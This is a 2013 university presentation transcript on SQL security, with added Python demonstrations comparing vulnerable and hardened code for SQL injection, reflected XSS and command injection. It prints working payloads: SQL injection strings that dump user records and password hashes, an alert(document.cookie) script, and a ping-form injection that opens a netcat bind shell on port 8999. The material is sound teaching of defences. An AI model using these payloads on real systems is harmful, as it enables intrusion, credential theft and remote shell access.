
Nick Tsamis University of Tulsa CS 7493 April 2013.

Presentation transcript:

1 Nick Tsamis University of Tulsa CS 7493 April 2013

2
- What is SQL?
- Why SQL matters
- *yawn* What's the big deal?
- What could possibly go wrong?
  - SQL injection
  - XSS
  - Command execution
- *pffft* So we shouldn't use SQL?
- That's some smart SQL!

3 Structured Query Language
- Language
  - A specialized programming language
  - Used with relational databases
- Query
  - Raw data is queried to obtain information
  - "Our business is turning data into information." – Michael A. Peterson
- Structured
  - Adheres to a strict, defined format
[Figure: anatomy of a SQL statement – Query, Table, Column]

4 Relational Databases vs Hierarchical Databases
- Relational: the relations between data (between tables) are stored explicitly
- Hierarchical: a tree structure with a top-down (parent to child) flow only

5 Popularity
- One of the first commercial languages for the relational model
- Today it is the de facto standard (ANSI and ISO standardized)
- It's EVERYWHERE
Versatility
- It's flexible; many dialects and query interfaces are built on it:
  - T-SQL
  - MySQL
  - LINQ

6 Vulnerabilities
- SQL is powerful... if you grant it the privileges
- It manages data, some of which is sensitive
- It provides a great entry point for access
- Example: a "recover lost password" form [screenshot]
- Security is not implicit
- Raw SQL built from user input is vulnerable to simple injections: if the submitted value is
  anything' OR 'x'='x
  the comparison in the WHERE clause becomes a condition that is always true

7 SQL Injection
- Injecting unintended code into a query
- Example: returning a user's name from a user ID
- Source code: [screenshot]
- The attack: we add a second condition that always evaluates to true (1=1); the purpose is to dump all user information
  $id = ' or 1=1 #
- The resulting WHERE clause:
  WHERE user_id = '' or 1=1 #'";
  (# starts a MySQL comment, so the application's closing quote is ignored)

8 SQL Injection
- Injecting unintended code into a query
- Returning information about the SQL server itself
- The attack(s): we add a UNION SELECT to dump additional data; the injected SELECT must return the same number of columns as the original query, which is why a dummy column (1) is padded in
  $id = ' union SELECT 1, user() #
  yields the current SQL user
  $id = ' and 1=1 union select database(),version() #
  yields the current database name and SQL server version

9 SQL Injection
- Injecting unintended code into a query
- Case study: returning the good stuff!!
- The attack(s): we add a UNION SELECT to dump password data
  $id = ' union select user, password FROM users #
  yields every user and the associated password (hash)

10 XSS (Cross Site Scripting)
- Execute unintended scripts inline
- Throw an alert
- The input is passed as a URL argument and reflected into the page [screenshot]
- What if we put an inline script in that URL?
- Alert box shown: [screenshot]

11 XSS (Cross Site Scripting)
- Well that wasn't exactly l33t...
- Have a cookie:
  alert(document.cookie)
  (document.cookie only exposes cookies that were set without the HttpOnly flag)
- Alert box shown: [screenshot]
- More serious implications:
  - Run a custom script that opens a remote connection (backdoor)
  - Read and dump configuration data (SQL or OS)
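The reflected-XSS sink from slides 10 and 11, as an added example that is not part of the original slides: a page echoes a URL argument into its HTML body. The vulnerable renderer concatenates the raw value, the hardened one HTML-encodes it, and a small parser reports whether a script element actually reached the document, which is what decides whether alert(document.cookie) runs. The parameter name "name", the template, and the URL are assumptions made for the demonstration.

```python
# Added example (not from the slides). Assumed: the reflected parameter is
# called "name" and is inserted into the body text of a simple template.
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

TEMPLATE = "<html><body><h1>Hello {name}</h1></body></html>"


def name_from_url(url):
    """Pull the reflected parameter out of the request URL (constructed input)."""
    qs = parse_qs(urlsplit(url).query)
    return qs.get("name", [""])[0]


def render_vulnerable(name):
    """Slide 10 pattern: user input concatenated straight into markup."""
    return TEMPLATE.format(name=name)


def render_hardened(name):
    """escape(quote=True) encodes < > & " ' so the value can only be text,
    never markup. Note: this is the fix for the HTML body context; an
    attribute or JavaScript context needs its own encoding."""
    return TEMPLATE.format(name=escape(name, quote=True))


class ScriptFinder(HTMLParser):
    """Collects the body of every <script> element, i.e. what the browser would run."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def scripts_in(html):
    """Return the list of inline script bodies present in the rendered page."""
    finder = ScriptFinder()
    finder.feed(html)
    return finder.scripts


if __name__ == "__main__":
    # Constructed attack URL carrying the slide 11 payload.
    url = "http://example.test/hello?name=<script>alert(document.cookie)</script>"
    name = name_from_url(url)
    print("vulnerable:", scripts_in(render_vulnerable(name)))
    print("hardened:  ", scripts_in(render_hardened(name)))
```

Running the module shows one script body, alert(document.cookie), in the vulnerable page and none in the hardened page, where the payload survives only as the literal text &lt;script&gt;....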

12 Command Execution
- Use the secret entrance
- A site that allows free IP pinging
- Sample source: [screenshot]
- Concatenating commands might work...
  ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe
- This starts a netcat (nc) listener on port 8999 with a shell wired to it through the named pipe (a bind shell)
- Upon execution, the browser request hangs while nc waits for a connection on port 8999
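The ping-form bug from slide 12 next to a hardened handler, as an added example that is not part of the original slides. It assumes the original page behaves like os.system("ping -c 1 " + ip); nothing here actually executes ping, the functions only build what would be executed so the difference can be inspected and tested offline. The helper names and the hardened design (validate as an IP address, then exec an argv list without a shell) are my own.

```python
# Added example (not from the slides). Assumed: the vulnerable handler
# concatenates user input into "ping -c 1 " and hands it to a shell.
import ipaddress
import shlex
import subprocess

# The slide 12 payload, as constructed attacker input appended to a valid IP.
PAYLOAD = ";mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe"


def vulnerable_command(target):
    """What the shell receives when input is concatenated: everything after
    ';' becomes additional commands run with the web server's privileges."""
    return "ping -c 1 " + target


def command_count(cmdline):
    """Count the simple commands a shell would see in cmdline by splitting on
    ';' and '|' (demonstration only; not a full shell grammar)."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lex if tok in (";", "|"))


def hardened_argv(target):
    """Validate first: only a literal IPv4/IPv6 address is accepted. Then
    build an argv list so no shell ever parses the value."""
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % target)
    return ["ping", "-c", "1", str(addr)]


def accepts(target):
    """True if the hardened validation would let target through."""
    try:
        hardened_argv(target)
        return True
    except ValueError:
        return False


def run_ping(target, timeout=5):
    """Execute the hardened form. shell=False (the default for a list) means
    argv goes straight to exec, so ';' or '|' in the input could never be
    interpreted even if validation were loosened."""
    argv = hardened_argv(target)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).returncode


if __name__ == "__main__":
    evil = "8.8.8.8" + PAYLOAD
    print(vulnerable_command(evil))
    print("commands the shell would run:", command_count(vulnerable_command(evil)))
    print("hardened accepts payload?", accepts(evil))
    print("hardened argv:", hardened_argv("8.8.8.8"))
```

With the payload appended the concatenated line contains four commands (ping, mkfifo, sh, nc); the hardened path rejects the same input outright, and even a value that passed validation would reach ping as a single argv element.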

13 Better SQL
- Stored Procedures
  - Preformat and secure a static query
  - Grant access to the SP, not to the tables it accesses
  - Typically increased performance
  - Parameter check: data typing
  - No network traffic for the query text; it runs inside the engine
  - Caveat: a stored procedure that builds dynamic SQL from its arguments is just as injectable as inline SQL
- String Filtering/Escaping
  - Escape the characters that terminate or alter a string literal: ' " \ NUL

14 Mo' Better SQL
- Parameterized SQL
  - Strongly typed data is bound at execution
  - Parameters are populated and checked
  - User input is never embedded in the query text
- Database Management
  - Permission limitation
  - Principle of Least Privilege
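The injection payloads from slides 7 to 9 and the escaping and parameterized fixes from slides 13 and 14, run side by side as an added example that is not part of the original slides. It uses an in-memory SQLite database so it works offline; the users table layout mirrors the DVWA-style exercise the slides show, and the password hashes are constructed sample data. Two dialect assumptions: SQLite's comment token is "--" where MySQL uses "#", and SQLite has no user() or database() functions, so sqlite_version() stands in for the slide 8 probes.

```python
# Added example (not from the slides). Assumed: a "users" table with
# user_id, first_name, last_name and password columns, queried by user_id.
import sqlite3


def make_db():
    """Constructed sample data: three users with fake password hashes."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
            (2, "gordonb", "brown", "e99a18c4428cb38d5f260853678922e03"),
            (3, "1337", "hack", "8d3533d75ae2c3966d7e0d4fcc69216b"),
        ],
    )
    return con


def lookup_vulnerable(con, user_id):
    """Slide 7 pattern: the input is concatenated into the query text, so a
    quote in it ends the literal and whatever follows is parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return con.execute(sql).fetchall()


def escape_sqlite_literal(value):
    """Slide 13 pattern: escaping. In SQLite the only escape inside a string
    literal is doubling the quote; a NUL byte is rejected because it would
    truncate the string in C-level APIs downstream."""
    if "\x00" in value:
        raise ValueError("NUL byte in input")
    return value.replace("'", "''")


def lookup_escaped(con, user_id):
    """Still string-built, but the literal can no longer be closed early.
    Works only while every string sink uses exactly this escaper."""
    sql = (
        "SELECT first_name, last_name FROM users WHERE user_id = '"
        + escape_sqlite_literal(user_id)
        + "'"
    )
    return con.execute(sql).fetchall()


def lookup_parameterized(con, user_id):
    """Slide 14 pattern: the query text is fixed; the value is bound as a
    parameter and never parsed as SQL, whatever characters it contains."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    payloads = [
        "1",                                                     # normal use
        "' or 1=1 --",                                           # slide 7
        "' union select 1, sqlite_version() --",                 # slide 8
        "' union select first_name, password from users --",     # slide 9
    ]
    for p in payloads:
        print(repr(p))
        print("  vulnerable:   ", lookup_vulnerable(con, p))
        print("  escaped:      ", lookup_escaped(con, p))
        print("  parameterized:", lookup_parameterized(con, p))
```

Against the vulnerable query the slide 7 payload returns every row, the slide 8 payload returns the server version padded with a dummy column, and the slide 9 payload returns every user with its hash. The escaped and parameterized lookups return nothing for all three, because the whole payload is treated as one (non-matching) user_id value.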


